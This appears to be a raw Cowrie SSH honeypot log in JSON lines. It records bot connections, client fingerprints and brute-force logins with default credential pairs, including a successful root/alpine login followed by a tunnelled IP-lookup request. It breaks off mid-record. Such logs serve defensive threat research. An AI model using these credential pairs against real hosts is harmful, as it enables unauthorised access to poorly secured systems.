{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T01:06:09.436176Z","src_ip":"212.227.125.160","session":"2cf50e63df8b"}
{"eventid":"cowrie.login.failed","username":"username","password":"password","message":"login attempt [username/password] failed","sensor":"my-vps","timestamp":"2025-08-28T01:06:09.533123Z","src_ip":"171.243.150.245","session":"0a81212a2c97"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T01:06:09.683298Z","src_ip":"212.227.125.160","session":"2cf50e63df8b"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"asteriskftp","message":"login attempt [ftpuser/asteriskftp] failed","sensor":"my-vps","timestamp":"2025-08-28T01:06:10.753062Z","src_ip":"212.227.125.160","session":"2cf50e63df8b"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:06:12.003380Z","src_ip":"212.227.125.160","session":"2cf50e63df8b"}
{"eventid":"cowrie.session.closed","duration":"29.3","message":"Connection lost after 29.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:06:15.751053Z","src_ip":"171.243.150.245","session":"0a81212a2c97"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57112,"dst_ip":"1.2.3.4","dst_port":22,"session":"98308e7a7486","protocol":"ssh","message":"New connection: 217.72.205.35:57112 (1.2.3.4:22) [session: 98308e7a7486]","sensor":"my-vps","timestamp":"2025-08-28T01:06:15.936841Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:06:15.937988Z","src_ip":"217.72.205.35","session":"98308e7a7486"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36494,"dst_ip":"1.2.3.4","dst_port":22,"session":"997e256c667b","protocol":"ssh","message":"New connection: 212.227.125.160:36494 (1.2.3.4:22) [session: 997e256c667b]","sensor":"my-vps","timestamp":"2025-08-28T01:06:21.025609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:06:21.026605Z","src_ip":"212.227.125.160","session":"997e256c667b"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T01:06:21.142994Z","src_ip":"212.227.125.160","session":"997e256c667b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36500,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ead1b103e50","protocol":"ssh","message":"New connection: 212.227.125.160:36500 (1.2.3.4:22) [session: 2ead1b103e50]","sensor":"my-vps","timestamp":"2025-08-28T01:06:21.376694Z"}
{"eventid":"cowrie.client.version","version":"MGLNDD_212.227.125.160_22","message":"Remote SSH version: MGLNDD_212.227.125.160_22","sensor":"my-vps","timestamp":"2025-08-28T01:06:21.377512Z","src_ip":"212.227.125.160","session":"2ead1b103e50"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:06:21.378716Z","src_ip":"212.227.125.160","session":"2ead1b103e50"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:06:31.026834Z","src_ip":"212.227.125.160","session":"997e256c667b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44846,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a9b04a6c518","protocol":"ssh","message":"New connection: 212.227.125.160:44846 (1.2.3.4:22) [session: 8a9b04a6c518]","sensor":"my-vps","timestamp":"2025-08-28T01:06:32.082796Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T01:06:32.092443Z","src_ip":"212.227.125.160","session":"8a9b04a6c518"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T01:06:32.317901Z","src_ip":"212.227.125.160","session":"8a9b04a6c518"}
{"eventid":"cowrie.login.failed","username":"username","password":"password","message":"login attempt [username/password] failed","sensor":"my-vps","timestamp":"2025-08-28T01:06:34.243108Z","src_ip":"212.227.125.160","session":"8a9b04a6c518"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:06:35.852087Z","src_ip":"212.227.125.160","session":"8a9b04a6c518"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32798,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e696fa3734b","protocol":"ssh","message":"New connection: 212.227.125.160:32798 (1.2.3.4:22) [session: 7e696fa3734b]","sensor":"my-vps","timestamp":"2025-08-28T01:07:00.005601Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T01:07:00.006742Z","src_ip":"212.227.125.160","session":"7e696fa3734b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T01:07:00.268924Z","src_ip":"212.227.125.160","session":"7e696fa3734b"}
{"eventid":"cowrie.login.success","username":"root","password":"alpine","message":"login attempt [root/alpine] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:07:02.136437Z","src_ip":"212.227.125.160","session":"7e696fa3734b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T01:07:04.687734Z","session":"7e696fa3734b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T01:07:04.934575Z","src_ip":"212.227.125.160","session":"7e696fa3734b"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:07:07.399421Z","src_ip":"212.227.125.160","session":"7e696fa3734b"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":36578,"dst_ip":"1.2.3.4","dst_port":22,"session":"5770cc313c52","protocol":"ssh","message":"New connection: 194.233.79.134:36578 (1.2.3.4:22) [session: 5770cc313c52]","sensor":"my-vps","timestamp":"2025-08-28T01:07:34.929964Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:07:34.930629Z","src_ip":"194.233.79.134","session":"5770cc313c52"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:07:35.663590Z","src_ip":"194.233.79.134","session":"5770cc313c52"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456","message":"login attempt [test/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T01:07:37.187444Z","src_ip":"194.233.79.134","session":"5770cc313c52"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:07:38.535921Z","src_ip":"194.233.79.134","session":"5770cc313c52"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53694,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc84c12aa1ba","protocol":"ssh","message":"New connection: 212.227.235.229:53694 (1.2.3.4:22) [session: dc84c12aa1ba]","sensor":"my-vps","timestamp":"2025-08-28T01:07:44.149672Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:07:44.150357Z","src_ip":"212.227.235.229","session":"dc84c12aa1ba"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T01:07:44.258198Z","src_ip":"212.227.235.229","session":"dc84c12aa1ba"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-28T01:07:44.579787Z","src_ip":"212.227.235.229","session":"dc84c12aa1ba"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:07:45.689406Z","src_ip":"212.227.235.229","session":"dc84c12aa1ba"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.245","src_port":48530,"dst_ip":"1.2.3.4","dst_port":22,"session":"38e1fd49a997","protocol":"ssh","message":"New connection: 171.243.150.245:48530 (1.2.3.4:22) [session: 38e1fd49a997]","sensor":"my-vps","timestamp":"2025-08-28T01:08:29.254908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T01:08:29.272736Z","src_ip":"171.243.150.245","session":"38e1fd49a997"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: 